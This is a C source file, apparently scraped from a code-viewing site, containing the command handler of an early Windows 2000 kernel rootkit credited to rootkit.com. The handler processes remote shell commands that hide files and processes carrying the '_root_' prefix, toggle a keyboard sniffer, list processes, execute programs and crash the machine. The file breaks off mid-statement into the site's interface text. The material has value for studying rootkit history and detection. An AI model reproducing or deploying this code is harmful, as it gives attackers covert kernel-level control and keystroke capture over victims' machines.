📄 rk_command.c
字号:
#include "rk_driver.h"
#include "rk_command.h"
#include "rk_defense.h"
#include "rk_process.h"
BOOL g_hide_directories = TRUE;
BOOL g_hide_proc = TRUE;
BOOL g_sniff_keys = FALSE;
// expeirmental exec command
int exec(PUNICODE_STRING ImageName);
////////////////////////////////////////////////////////////////////
// commands passed from the kernel shell are handled here
//
////////////////////////////////////////////////////////////////////
void process_rootkit_command(char *theCommand)
{
char _c[256];
BOOL return_prompt = TRUE;
sprintf(_c, "rootkit: process_rootkit_command %s, len %d", theCommand, strlen(theCommand));
DbgPrint(_c);
if(0 == strlen(theCommand))
{
//the user pressed return, which is meant to break out
//of sniffer-modes - so make sure all sniffers are off
if(g_sniff_keys)
{
char _t[] = "------------------------------------------\r\nsniffkeys is now OFF.\r\n";
g_sniff_keys = FALSE;
ReturnDataToClient(_t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'help'
// return a help string
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "help"))
{
char _help[] = "Win2K Rootkit by the team rootkit.com\r\n" \
"Version 0.4 alpha\r\n" \
"------------------------------------------\r\n" \
"command description \r\n" \
"\r\n" \
"ps show proclist \r\n" \
"help this data \r\n" \
"buffertest debug output \r\n" \
"hidedir hide prefixed file/dir\r\n" \
"hideproc hide prefixed processes\r\n" \
"debugint (BSOD)fire int3 \r\n" \
"sniffkeys toggle keyboard sniffer\r\n" \
"echo <string> echo the given string\r\n" \
"\r\n*(BSOD) means Blue Screen of Death\r\n" \
"if a kernel debugger is not present!\r\n" \
"*'prefixed' means the process or filename\r\n" \
"starts with the letters '_root_'.\r\n" \
"\r\n";
ReturnDataToClient(_help, strlen(_help));
}
////////////////////////////////////////////////////////////////
// Command: 'echo' 'string'
// echo back the string, useful for rootkit patches that need
// to send data to a connected client
////////////////////////////////////////////////////////////////
else if(0 == memcmp(theCommand, "echo ", 5))
{
int l = strlen(&theCommand[5]);
if(l)
{
return_prompt=FALSE;
ReturnDataToClient(&theCommand[5], l);
}
}
////////////////////////////////////////////////////////////////
// Command: 'ps'
// returns the process list running on the host
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "ps"))
{
command_get_proclist();
}
////////////////////////////////////////////////////////////////
// Command: 'exec'
// test of exec command
////////////////////////////////////////////////////////////////
else if(0 == memcmp(theCommand, "exec ",5))
{
PUNICODE_STRING uCmdLine;
ANSI_STRING aCmdLine;
aCmdLine.Length=strlen(theCommand)-5;
aCmdLine.MaximumLength=aCmdLine.Length;
aCmdLine.Buffer=&theCommand[5];
uCmdLine=ExAllocatePool(NonPagedPool,sizeof(UNICODE_STRING));
RtlAnsiStringToUnicodeString(uCmdLine,&aCmdLine,TRUE);
exec(uCmdLine);
RtlFreeUnicodeString(uCmdLine);
ExFreePool(uCmdLine);
}
////////////////////////////////////////////////////////////////
// Command: 'buffertest'
// debug function causes a large number of packets to return
// used to debug the TCP/IP stack functionality
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "buffertest"))
{
int count=0;
for(count=0;count<100;count++)
{
int x;
sprintf(_c, ".%d.", count);
x = strlen(_c);
ReturnDataToClient(_c, x);
}
}
////////////////////////////////////////////////////////////////
// Command: 'sniffkeys'
// toggles keyboard sniffer
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "sniffkeys"))
{
if(g_sniff_keys)
{
char _t[] = "keyboard sniffing now OFF\r\n";
g_sniff_keys = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "keyboard sniffing now ON\r\n------------------------------------------\r\n";
return_prompt=FALSE;
g_sniff_keys = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'hidedir'
// toggles directory hiding with '_root_' prefix
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "hidedir"))
{
if(g_hide_directories)
{
char _t[] = "directory prefix-hiding now OFF\r\n";
g_hide_directories = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "directory prefix-hiding now ON\r\n";
g_hide_directories = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'hideproc'
// toggles process hiding with '_root_' prefix
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "hideproc"))
{
if(g_hide_proc)
{
char _t[] = "process prefix-hiding now OFF\r\n";
g_hide_proc = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "process prefix-hiding now ON\r\n";
g_hide_proc = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'debugint'
// debug function causes a debug interrupt to fire
// this will BSOD the machine unless a kernel debugger is
// present.
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "debugint"))
{
__asm int 3
}
else
{
char t[256];
sprintf(t, "error: unknown or malformed command %s\r\n", theCommand);
ReturnDataToClient( t, strlen(t));
}
if(return_prompt)
//this is our prompt, an upside-down question-mark ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -